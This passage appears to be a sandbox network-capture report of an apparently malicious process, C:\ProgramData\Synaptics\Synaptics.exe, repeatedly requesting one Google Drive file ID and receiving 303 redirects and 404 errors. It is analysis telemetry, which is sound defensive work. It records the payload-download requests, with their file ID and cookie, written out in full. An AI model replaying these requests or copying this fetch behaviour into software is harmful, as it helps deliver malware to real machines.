                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.7 | 50120 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:34 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:34 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC5W6YnuABOaMnzcH905lH1YuLU8TSDgxUapWGv2OEv6pcr09ijtmnsMS5Fb_0ersk9P
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:34 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-EZFpycfDYrroUTPpizE3Ng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:34 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:48:34 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="ssY-2Gk5iazL2Pb2ndOSdQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:34 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.7 | 50121 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:34 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:34 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC75v8hsAMmHLV5cMDrZEPqXt3-JFWhA7z2XQXISy9Psi0regh-UrBla2ovfTX7WbA9X9etom9E
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:34 GMT
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-a2n-I9hjO6niavD8rIUFqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:34 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:48:34 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="p1piihUXp-_0y3NP1eAjtg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:48:34 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.7 | 50122 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:34 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:35 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:35 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-NpYgjHcw1F36QxbOmuz9-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.7 | 50123 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:34 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:35 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:35 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-7K-XWNDgyCCBzgYXuk8c8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
100 | 192.168.2.7 | 50128 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:35 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:36 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7fI9Y1fM-Z4_V2C6mkWRbnWPDz9pi3vcBftr46m-A4dwB9cjIzT1kUt9BHzyihhGCISH70x2o
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:36 GMT
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-6Tie74mkdyyaZKr5qjkeGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:36 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:48:36 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="k7mIKH61oq-y9ujFG2NlSg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:48:36 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
101 | 192.168.2.7 | 50127 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:35 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:36 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-QU0rz-f909hCqG9FiqpYRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.7 | 50130 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:35 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:36 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-exCDov0P0hFElMN2zq1Nvg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.7 | 50129 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:35 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:36 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC54KiVpcBu2nY65JLIaFtSEo6_qKzKFnfwMGWpZeZtP6dDcTNlU6k5W4-D70jCtlbz37ge_Eas
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:36 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-l5sNE6-RkMlz5NugYVCoTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:36 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:48:36 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="PViCS9hrRPJMkqe2msZGNA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:48:36 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
104 | 192.168.2.7 | 50133 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:36 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:37 UTC | 1250 | IN | HTTP/1.1 404 Not Found
X-GUploader-UploadID: AFiumC7tFm43SHQ8M_hkHIYNGOOkx9yROYvcLACVCTuKJlD5JTkymPyBpeH6z8Rzhb1RFr1kTBVgsUI
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 10:48:37 GMT
Content-Security-Policy: script-src 'report-sample' 'nonce-Px0bYMPCmrCj2T7PnXR1Jg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Length: 1652
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
Connection: close
2024-12-30 10:48:37 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:48:37 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="aOH_VYf_NVSb4A7Br6l7ww">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:48:37 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.2.7 | 50132 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:36 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
106 | 192.168.2.7 | 50134 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:37 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
